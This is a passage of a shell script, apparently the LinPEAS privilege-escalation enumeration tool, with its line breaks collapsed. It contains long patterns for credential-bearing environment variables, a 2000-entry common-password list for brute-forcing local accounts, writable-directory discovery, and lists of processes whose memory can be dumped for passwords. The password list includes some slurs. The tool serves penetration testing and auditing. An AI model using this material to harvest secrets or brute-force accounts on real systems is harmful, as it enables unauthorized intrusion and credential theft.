pwd_in_variables6="GOOGLE_CLIENT_EMAIL|GOOGLE_CLIENT_ID|GOOGLE_CLIENT_SECRET|GOOGLE_MAPS_API_KEY|GOOGLE_PRIVATE_KEY|gpg.passphrase|GPG_EMAIL|GPG_ENCRYPTION|GPG_EXECUTABLE|GPG_KEYNAME|GPG_KEY_NAME|GPG_NAME|GPG_OWNERTRUST|GPG_PASSPHRASE|GPG_PRIVATE_KEY|GPG_SECRET_KEYS|gradle.publish.key|gradle.publish.secret|GRADLE_SIGNING_KEY_ID|GREN_GITHUB_TOKEN|GRGIT_USER|HAB_AUTH_TOKEN|HAB_KEY|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|HEROKU_API_KEY|HEROKU_API_USER|HEROKU_EMAIL|HEROKU_TOKEN|HOCKEYAPP_TOKEN|INTEGRATION_TEST_API_KEY|INTEGRATION_TEST_APPID|INTERNAL-SECRETS|IOS_DOCS_DEPLOY_TOKEN|IRC_NOTIFICATION_CHANNEL|JDBC:MYSQL|jdbc_databaseurl|jdbc_host|jdbc_user|JWT_SECRET|KAFKA_ADMIN_URL|KAFKA_INSTANCE_NAME|KAFKA_REST_URL|KEYSTORE_PASS|KOVAN_PRIVATE_KEY|LEANPLUM_APP_ID|LEANPLUM_KEY|LICENSES_HASH|LICENSES_HASH_TWO|LIGHTHOUSE_API_KEY|LINKEDIN_CLIENT_ID|LINKEDIN_CLIENT_SECRET|LINODE_INSTANCE_ID|LINODE_VOLUME_ID|LINUX_SIGNING_KEY|LL_API_SHORTNAME|LL_PUBLISH_URL|LL_SHARED_KEY|LOOKER_TEST_RUNNER_CLIENT_ID|LOOKER_TEST_RUNNER_CLIENT_SECRET|LOOKER_TEST_RUNNER_ENDPOINT|LOTTIE_HAPPO_API_KEY|LOTTIE_HAPPO_SECRET_KEY|LOTTIE_S3_API_KEY|LOTTIE_S3_SECRET_KEY|mailchimp_api_key|MAILCHIMP_KEY|mailchimp_list_id|mailchimp_user|MAILER_HOST|MAILER_TRANSPORT|MAILER_USER"
pwd_in_variables7="MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KEY|MAILGUN_PUB_APIKEY|MAILGUN_PUB_KEY|MAILGUN_SECRET_API_KEY|MAILGUN_TESTDOMAIN|ManagementAPIAccessToken|MANAGEMENT_TOKEN|MANAGE_KEY|MANAGE_SECRET|MANDRILL_API_KEY|MANIFEST_APP_TOKEN|MANIFEST_APP_URL|MapboxAccessToken|MAPBOX_ACCESS_TOKEN|MAPBOX_API_TOKEN|MAPBOX_AWS_ACCESS_KEY_ID|MAPBOX_AWS_SECRET_ACCESS_KEY|MG_API_KEY|MG_DOMAIN|MG_EMAIL_ADDR|MG_EMAIL_TO|MG_PUBLIC_API_KEY|MG_SPEND_MONEY|MG_URL|MH_APIKEY|MILE_ZERO_KEY|MINIO_ACCESS_KEY|MINIO_SECRET_KEY|MYSQLMASTERUSER|MYSQLSECRET|MYSQL_DATABASE|MYSQL_HOSTNAMEMYSQL_USER|MY_SECRET_ENV|NETLIFY_API_KEY|NETLIFY_SITE_ID|NEW_RELIC_BETA_TOKEN|NGROK_AUTH_TOKEN|NGROK_TOKEN|node_pre_gyp_accessKeyId|NODE_PRE_GYP_GITHUB_TOKEN|node_pre_gyp_secretAccessKey|NPM_API_KEY|NPM_API_TOKEN|NPM_AUTH_TOKEN|NPM_EMAIL|NPM_SECRET_KEY|NPM_TOKEN|NUGET_APIKEY|NUGET_API_KEY|NUGET_KEY|NUMBERS_SERVICE|NUMBERS_SERVICE_PASS|NUMBERS_SERVICE_USER|OAUTH_TOKEN|OBJECT_STORAGE_PROJECT_ID|OBJECT_STORAGE_USER_ID|OBJECT_STORE_BUCKET|OBJECT_STORE_CREDS|OCTEST_SERVER_BASE_URL|OCTEST_SERVER_BASE_URL_2|OC_PASS|OFTA_KEY|OFTA_SECRET|OKTA_CLIENT_TOKEN|OKTA_DOMAIN|OKTA_OAUTH2_CLIENTID|OKTA_OAUTH2_CLIENTSECRET|OKTA_OAUTH2_CLIENT_ID|OKTA_OAUTH2_CLIENT_SECRET"
pwd_in_variables8="OKTA_OAUTH2_ISSUER|OMISE_KEY|OMISE_PKEY|OMISE_PUBKEY|OMISE_SKEY|ONESIGNAL_API_KEY|ONESIGNAL_USER_AUTH_KEY|OPENWHISK_KEY|OPEN_WHISK_KEY|OSSRH_PASS|OSSRH_SECRET|OSSRH_USER|OS_AUTH_URL|OS_PROJECT_NAME|OS_TENANT_ID|OS_TENANT_NAME|PAGERDUTY_APIKEY|PAGERDUTY_ESCALATION_POLICY_ID|PAGERDUTY_FROM_USER|PAGERDUTY_PRIORITY_ID|PAGERDUTY_SERVICE_ID|PANTHEON_SITE|PARSE_APP_ID|PARSE_JS_KEY|PAYPAL_CLIENT_ID|PAYPAL_CLIENT_SECRET|PERCY_TOKEN|PERSONAL_KEY|PERSONAL_SECRET|PG_DATABASE|PG_HOST|PLACES_APIKEY|PLACES_API_KEY|PLACES_APPID|PLACES_APPLICATION_ID|PLOTLY_APIKEY|POSTGRESQL_DB|POSTGRESQL_PASS|POSTGRES_ENV_POSTGRES_DB|POSTGRES_ENV_POSTGRES_USER|POSTGRES_PORT|PREBUILD_AUTH|PROD.ACCESS.KEY.ID|PROD.SECRET.KEY|PROD_BASE_URL_RUNSCOPE|PROJECT_CONFIG|PUBLISH_KEY|PUBLISH_SECRET|PUSHOVER_TOKEN|PUSHOVER_USER|PYPI_PASSOWRD|QUIP_TOKEN|RABBITMQ_SERVER_ADDR|REDISCLOUD_URL|REDIS_STUNNEL_URLS|REFRESH_TOKEN|RELEASE_GH_TOKEN|RELEASE_TOKEN|remoteUserToShareTravis|REPORTING_WEBDAV_URL|REPORTING_WEBDAV_USER|repoToken|REST_API_KEY|RINKEBY_PRIVATE_KEY|ROPSTEN_PRIVATE_KEY|route53_access_key_id|RTD_KEY_PASS|RTD_STORE_PASS|RUBYGEMS_AUTH_TOKEN|s3_access_key|S3_ACCESS_KEY_ID|S3_BUCKET_NAME_APP_LOGS|S3_BUCKET_NAME_ASSETS|S3_KEY"
pwd_in_variables9="S3_KEY_APP_LOGS|S3_KEY_ASSETS|S3_PHOTO_BUCKET|S3_SECRET_APP_LOGS|S3_SECRET_ASSETS|S3_SECRET_KEY|S3_USER_ID|S3_USER_SECRET|SACLOUD_ACCESS_TOKEN|SACLOUD_ACCESS_TOKEN_SECRET|SACLOUD_API|SALESFORCE_BULK_TEST_SECURITY_TOKEN|SANDBOX_ACCESS_TOKEN|SANDBOX_AWS_ACCESS_KEY_ID|SANDBOX_AWS_SECRET_ACCESS_KEY|SANDBOX_LOCATION_ID|SAUCE_ACCESS_KEY|SECRETACCESSKEY|SECRETKEY|SECRET_0|SECRET_10|SECRET_11|SECRET_1|SECRET_2|SECRET_3|SECRET_4|SECRET_5|SECRET_6|SECRET_7|SECRET_8|SECRET_9|SECRET_KEY_BASE|SEGMENT_API_KEY|SELION_SELENIUM_SAUCELAB_GRID_CONFIG_FILE|SELION_SELENIUM_USE_SAUCELAB_GRID|SENDGRID|SENDGRID_API_KEY|SENDGRID_FROM_ADDRESS|SENDGRID_KEY|SENDGRID_USER|SENDWITHUS_KEY|SENTRY_AUTH_TOKEN|SERVICE_ACCOUNT_SECRET|SES_ACCESS_KEY|SES_SECRET_KEY|setDstAccessKey|setDstSecretKey|setSecretKey|SIGNING_KEY|SIGNING_KEY_SECRET|SIGNING_KEY_SID|SNOOWRAP_CLIENT_SECRET|SNOOWRAP_REDIRECT_URI|SNOOWRAP_REFRESH_TOKEN|SNOOWRAP_USER_AGENT|SNYK_API_TOKEN|SNYK_ORG_ID|SNYK_TOKEN|SOCRATA_APP_TOKEN|SOCRATA_USER|SONAR_ORGANIZATION_KEY|SONAR_PROJECT_KEY|SONAR_TOKEN|SONATYPE_GPG_KEY_NAME|SONATYPE_GPG_PASSPHRASE|SONATYPE_PASSSONATYPE_TOKEN_USER|SONATYPE_USER|SOUNDCLOUD_CLIENT_ID|SOUNDCLOUD_CLIENT_SECRET|SPACES_ACCESS_KEY_ID|SPACES_SECRET_ACCESS_KEY"
pwd_in_variables10="SPA_CLIENT_ID|SPOTIFY_API_ACCESS_TOKEN|SPOTIFY_API_CLIENT_ID|SPOTIFY_API_CLIENT_SECRET|sqsAccessKey|sqsSecretKey|SRCCLR_API_TOKEN|SSHPASS|SSMTP_CONFIG|STARSHIP_ACCOUNT_SID|STARSHIP_AUTH_TOKEN|STAR_TEST_AWS_ACCESS_KEY_ID|STAR_TEST_BUCKET|STAR_TEST_LOCATION|STAR_TEST_SECRET_ACCESS_KEY|STORMPATH_API_KEY_ID|STORMPATH_API_KEY_SECRET|STRIPE_PRIVATE|STRIPE_PUBLIC|STRIP_PUBLISHABLE_KEY|STRIP_SECRET_KEY|SURGE_LOGIN|SURGE_TOKEN|SVN_PASS|SVN_USER|TESCO_API_KEY|THERA_OSS_ACCESS_ID|THERA_OSS_ACCESS_KEY|TRAVIS_ACCESS_TOKEN|TRAVIS_API_TOKEN|TRAVIS_COM_TOKEN|TRAVIS_E2E_TOKEN|TRAVIS_GH_TOKEN|TRAVIS_PULL_REQUEST|TRAVIS_SECURE_ENV_VARS|TRAVIS_TOKEN|TREX_CLIENT_ORGURL|TREX_CLIENT_TOKEN|TREX_OKTA_CLIENT_ORGURL|TREX_OKTA_CLIENT_TOKEN|TWILIO_ACCOUNT_ID|TWILIO_ACCOUNT_SID|TWILIO_API_KEY|TWILIO_API_SECRET|TWILIO_CHAT_ACCOUNT_API_SERVICE|TWILIO_CONFIGURATION_SID|TWILIO_SID|TWILIO_TOKEN|TWITTEROAUTHACCESSSECRET|TWITTEROAUTHACCESSTOKEN|TWITTER_CONSUMER_KEY|TWITTER_CONSUMER_SECRET|UNITY_SERIAL|URBAN_KEY|URBAN_MASTER_SECRET|URBAN_SECRET|userTravis|USER_ASSETS_ACCESS_KEY_ID|USER_ASSETS_SECRET_ACCESS_KEY|VAULT_APPROLE_SECRET_ID|VAULT_PATH|VIP_GITHUB_BUILD_REPO_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY_PASS"
pwd_in_variables11="VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY"
top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111
abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890
000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey
shadow jessica letmein baseball whatever princess abcd1234 123321 starwars
121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom
password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes
benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie
asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua
banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4
elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung
qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda
maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey
123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow
nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea
spider scooter richard soccer rachel purple morgan melissa jackson arsenal
222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince
maggie austin veronica nicholas monster dexter carlos thunder success hannah
ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december
chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia
christian asshole spiderman sandra hockey angels security parker heather 888888
victor harley 333333 system slipknot november jordan23 canada tennis qwertyui
casper gemini asd123 winter hammer cooper america albert 777777 winner charles
butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore
corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky
natasha arthur vanessa marina leonardo johnny dallas antonio winston \ snickers
olivia nothing iceman destiny coffee apollo 696969 windows williams school
madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan
guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef
maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey
00000000 snowball scooby nikita falcon august test123 sebastian panther love
johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123
fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein
cricket cameron angel admin napoleon mountain lovely friend flowers dolphins
david chicago sierra knight yankees wilson warrior simple nelson muffin
charlotte calvin spencer newyork florida fernando claudia basketball barcelona
87654321 willow stupid samson police paradise motorola manager jaguar jackie
family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven
elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire
american vincent testing pumpkin platinum louise kitten general united turtle
marine icecream hacker darkness cristina colorado boomer alexandra steelers
serenity please montana mitchell marcus lollipop jessie happy cowboy 102030
marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111
startrek fishing digital christine business abcdefg nintendo genius 12qwaszx
walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin
jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom
hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester
gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers
james angelica 55555 vampire tiffany september private maximus loveme isabelle
isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket
passport pandora justice infinity cookies barbie xavier unicorn superstar \
stephen rangers orlando money domino courtney viking tucker travis scarface
pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy
peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire
saturn nemesis little dreams catherine brother birthday 1111111 wolverine
victory student france fantasy enigma copper bonnie teresa mexico guinness
georgia california sweety logitech julian hotdog emmanuel butter beatles
11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem
douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel
debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest
eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera
england chris zachary westside tamara password123 pass maryjane lincoln willie
teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college
blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence
sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring
qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super
stardust sophia sharon robbie predator penelope michigan margaret jesus hawaii
green brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead
redskins qwertyu pussycat houston horses gunner fireball donkey cherokee
australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina
eugene christ thailand support special runner lasvegas jason fuckme butthead
blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal
melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus
random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007
valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds
daniela christopher bradley bananas warcraft sunset simone renegade \ redsox
philip monday mohammed indiana energy bond007 avalon terminator skipper shopping
scotty savannah raymond morris mnbvcxz michele lucky lucifer kingdom karina
giovanni cynthia a123456 147852 12121212 wildcats ronald portugal mike helpme
froggy dragons cancer bullet beautiful alabama 212121 unknown sunflower sports
siemens santiago kathleen hotmail hamster golfer future father enterprise
clifford christina camille camaro beauty 55555555 vision tornado something
rosemary qweasd patches magic helena denver cracker beaver basket atlanta
vacation smiles ricardo pascal newton jeffrey jasmin january honey hollywood
holiday gloria element chandler booger angelo allison action 99999999 target
snowman miguel marley lorraine howard harmony children celtic beatrice airborne
wicked voyager valentin thx1138 thumper samurai moonlight mmmmmm karate kamikaze
jamaica emerald bubble brooke zombie strawberry spooky software simpson service
sarah racing qazxsw philips oscar minnie lalala ironman goddess extreme empire
elaine drummer classic carrie berlin asdfg 22222222 valerie tintin therock
sunday skywalker salvador pegasus panthers packers network mission mark legolas
lacrosse kitty kelly jester italia hiphop freeman charlie1 cardinal bluemoon
bbbbbb bastard alyssa 0123456789 zeppelin tinker surfer smile rockstar operator
naruto freddie dragonfly dickhead connor anaconda amsterdam alfred a12345
789456123 77777777 trooper skittles shalom raptor pioneer personal ncc1701
nascar music kristen kingkong global geronimo germany country christmas bernard
benson wrestling warren techno sunrise stefan sister savage russell robinson
oracle millie maddog lightning kingston kennedy hannibal garcia download dollar
darkstar brutus bobby autumn webster vanilla undertaker tinkerbell sweetpea
ssssss softball rafael panasonic pa55word keyboard isabel hector fisher dominic
darkside cleopatra blue assassin amelia vladimir roland \ nigger national
monique molly matthew1 godfather frank curtis change central cartman brothers
boogie archie warriors universe turkey topgun solomon sherry sakura rush2112
qwaszx office mushroom monika marion lorenzo john herman connect chopper burton
blondie bitch bigdaddy amber 456789 1a2b3c4d ultimate tequila tanner sweetie
scott rocky popeye peterpan packard loverboy leonard jimmy harry griffin design
buddha 1 wallace truelove trombone toronto tarzan shirley sammy pebbles natalia
marcel malcolm madeline jerome gilbert gangster dingdong catalina buddy blazer
billy bianca alejandro 54321 252525 111222 0000 water sucker rooster potato
norton lucky1 loving lol123 ladybug kittycat fuck forget flipper fireman digger
bonjour baxter audrey aquarius 1111111111 pppppp planet pencil patriots oxford
million martha lindsay laura jamesbond ihateyou goober giants garden diana
cecilia brazil blessing bishop bigdog airplane Password1 tomtom stingray psycho
pickle outlaw number1 mylove maurice madman maddie lester hendrix hellfire
happy1 guardian flamingo enter chichi 0987654321 western twister trumpet trixie
socrates singer sergio sandman richmond piglet pass123 osiris monkey1 martina
justine english electric church castle caesar birdie aurora artist amadeus
alberto 246810 whitney thankyou sterling star ronnie pussy printer picasso
munchkin morpheus madmax kaiser julius imperial happiness goodluck counter
columbia campbell blessed blackjack alpha 999999999 142536 wombat wildcat trevor
telephone smiley saints pretty oblivion newcastle mariana janice israel imagine
freedom1 detroit deedee darren catfish adriana washington warlock valentina
valencia thebest spectrum skater sheila shaggy poiuyt member jessica1 jeremiah
jack insane iloveu handsome goldberg gabriela elijah damien daisy buttons blabla
bigboy apache anthony1 a1234567 xxxxxxxx toshiba tommy sailor peekaboo
motherfucker montreal manuel madrid kramer \ katherine kangaroo jenny immortal
harris hamlet gracie fucking firefly chocolat bentley account 321321 2222 1a2b3c
thompson theman strike stacey science running research polaris oklahoma mariposa
marie leader julia island idontknow hitman german felipe fatcat fatboy defender
applepie annette 010203 watson travel sublime stewart steve squirrel simon sexy
pineapple phoebe paris panzer nadine master1 mario kelsey joker hongkong gorilla
dinosaur connie bowling bambam babydoll aragorn andreas 456123 151515 wolves
wolfgang turner semperfi reaper patience marilyn fletcher drpepper dorothy
creation brian bluesky andre yankee wordpass sweet spunky sidney serena preston
pauline passwort original nightmare miriam martinez labrador kristin kissme
henry gerald garrett flash excalibur discovery dddddd danny collins casino
broncos brendan brasil apple123 yvonne wonder window tomato sundance sasha
reggie redwings poison mypassword monopoly mariah margarita lionking king
football1 director darling bubba biscuit 44444444 wisdom vivian virgin sylvester
street stones sprite spike single sherlock sandy rocker robin matt marianne
linda lancelot jeanette hobbes fred ferret dodger cotton corona clayton celine
cannabis bella andromeda 7654321 4444 werewolf starcraft sampson redrum pyramid
prodigy paul michel martini marathon longhorn leopard judith joanne jesus1
inferno holly harold happy123 esther dudley dragon1 darwin clinton celeste
catdog brucelee argentina alpine 147852369 wrangler william1 vikings trigger
stranger silvia shotgun scarlett scarlet redhead raider qweasdzxc playstation
mystery morrison honda february fantasia designer coyote cool bulldogs bernie
baby asdfghj angel1 always adam 202020 wanker sullivan stealth skeeter saturday
rodney prelude pingpong phillip peewee peanuts peace nugget newport myself mouse
memphis lover lancer kristine james1 hobbit halloween fuckyou1 finger fearless
dodgers delete cougar \ charmed cassandra caitlin bismillah believe alice
airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam
qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches
741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela
meredith masters lindsey history farmer express escape cuddles carson candy
buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789
12345678910 00000 universal trinidad tobias thursday surfing stuart stinky
standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace
goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis
anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok
portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts
gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando
clover clarence center cadillac brooks bronco bonita babylon archer alexandre
123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia
roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark
kitkat julie graham frances estrella downtown doodle deborah cooler colombia
chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique
sweets station showtime sheena santos rock revolution reading qwerasdf password2
mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy
cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd
wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature
marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin
devils damian christy braves baller anarchy white valeria underground strong
poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily
divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna
animals \ andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear
tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind
marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall
faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob
blackie beagle admin123 010101 together spongebob snakes sherman reddog reality
ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife
franco foster formula1 felix dragonball desiree default chris1 bunny bobcat
asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle
santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie
cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker
stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher
panama paladin none lovelife lights jerry iverson inside hornet holden groovy
gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button
administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego
rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop
katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores
conrad chickens charity casey blueberry blackman blackbird bill beckham battle
atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll
richie poop pitbull mississippi kisses karen juliana james123 iguana homework
highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet
159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university
tropical swimmer sugar southpark silence sammie ravens question presario
poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave
dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume
valhalla tomorrow starlight scruffy roscoe richard1 positive \ plymouth pepsi
patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson
elliott dominique doberman dillon criminal crackers converse chrissy casanova
blowme attitude" PASSTRY="2000" # Default num of passwds to try (all by default)
if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ];
then MAXPATH_FIND_W="1"; fi # If Network reduce the time on this
SEDOVERFLOW=true for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do
wgroups="$wgroups -group $grp -or " done wgroups="$(echo $wgroups | sed -e 's/
-or$//')" while $SEDOVERFLOW; do #WF=`find /dev /srv /proc /home /media /sys
/lost+found /run /etc /root /var /tmp /mnt /boot /opt -type d -maxdepth
$MAXPATH_FIND_W -writable -or -user $USER 2>/dev/null | sort` #if [ "$MACPEAS"
]; then WF=$(find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '('
-user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')'
')' ')' 2>/dev/null | sort) #OpenBSD find command doesn't have "-writable"
option #else # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*"
-and '(' -writable -or -user $USER ')' 2>/dev/null | sort` #fi Wfolders=$(printf
"%s" "$WF" | tr '\n' '|')"|[a-zA-Z]+[a-zA-Z0-9]* +\*" Wfolder="$(printf "%s"
"$WF" | grep "/shm" | head -n1)" # Try to get /dev/shm if ! [ "$Wfolder" ]; then
Wfolder="$(printf "%s" "$WF" | grep
"tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications"
| head -n1)" fi printf "test\ntest\ntest\ntest"| sed -${E}
"s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" >/dev/null 2>&1 if [ $? -eq 0 ];
then SEDOVERFLOW=false else MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) # If overflow
of directories, check again with MAXPATH_FIND_W - 1 fi if [ $MAXPATH_FIND_W -lt
1 ] ; then # Prevents infinite loop SEDOVERFLOW=false fi done
notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$|\.j2k$|\.j2c$|\.fpx$|\.pcd$|\.png$|\.pdf$|\.flv$|\.mp4$|\.mp3$|\.gifv$|\.avi$|\.mov$|\.mpeg$|\.wav$|\.doc$|\.docx$|\.xls$|\.xlsx$|\.svg$"
TIMEOUT="$(command -v timeout 2>/dev/null)" STRACE="$(command -v strace
2>/dev/null)" STRINGS="$(command -v strings 2>/dev/null)" LDD="$(command -v ldd
2>/dev/null)" READELF="$(command -v readelf 2>/dev/null)"
shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/prl-opengl-switcher.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
notBackup="/tdbbackup$|/db_hotbackup$"
cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|mod-pagespeed|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|"
cronjobsB="centreon" processesVB='jdwp|tmux |screen | inspect |--inspect[=
]|--inspect$|--inpect-brk|--remote-debugging-port'
processesB="amazon-ssm-agent|knockd|splunk"
processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:"
mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier"
profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|im-config_wayland.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh"
